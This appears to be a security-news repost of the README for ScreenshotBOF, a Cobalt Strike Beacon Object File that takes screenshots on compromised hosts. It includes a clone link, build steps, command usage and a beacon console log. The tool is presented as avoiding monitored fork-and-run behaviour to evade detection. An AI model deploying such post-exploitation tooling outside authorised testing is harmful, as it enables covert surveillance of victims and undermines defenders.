ScreenshotBOF: alternative screenshot capability for Cobalt Strike

by Nam Phong · September 21, 2025

ScreenshotBOF

An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. The screenshot was downloaded in memory.

Changelog v2.0

JPEG is used in place of BMP
Moved to mingw
Added beacon screenshot callback option
Removed BMP renderer (it will be missed)
Supports capturing of minimized windows

Why did I make this?

Cobalt Strike uses a technique known as fork & run for many of its post-ex capabilities, including the screenshot command. While this behavior provides stability, it is now well-known and heavily monitored. This BOF is meant to provide a more OPSEC-safe version of the screenshot capability.

Self Compilation

git clone the repo: git clone https://github.com/CodeXTF2/ScreenshotBOF.git
open the solution in Visual Studio
Build project BOF

Save methods:

drop file to disk
download file over beacon (Cobalt Strike only)

Usage

import the screenshotBOF.cna script into Cobalt Strike
use the command screenshot_bof {local filename} {save method 0/1}[pastacode lang=”markup” message=”” highlight=”” provider=”manual” manual=”beacon%3E%20screenshot_bof%20sad.bmp%201%0A%5B*%5D%20Running%20screenshot%20BOF%20by%20(%40codex_tf2)%0A%5B%2B%5D%20host%20called%20home%2C%20sent%3A%205267%20bytes%0A%5B%2B%5D%20received%20output%3A%0A%5B*%5D%20Screen%20saved%20to%20bitmap%0A%5B%2B%5D%20received%20output%3A%0A%5B*%5D%20Downloading%20bitmap%20over%20beacon%20with%20filename%20sad.bmp%0A%5B*%5D%20started%20download%20of%20sad.bmp”/]
if downloaded over beacon, BMP can be viewed in Cobalt Strike by right-clicking the download and clicking “Render BMP” (credit @BinaryFaultline)

Source: https://github.com/CodeXTF2/

Support Our Threat Intelligence

If you find our technology report and cybersecurity news helpful, consider supporting our work.

Buy Me a Coffee PayPal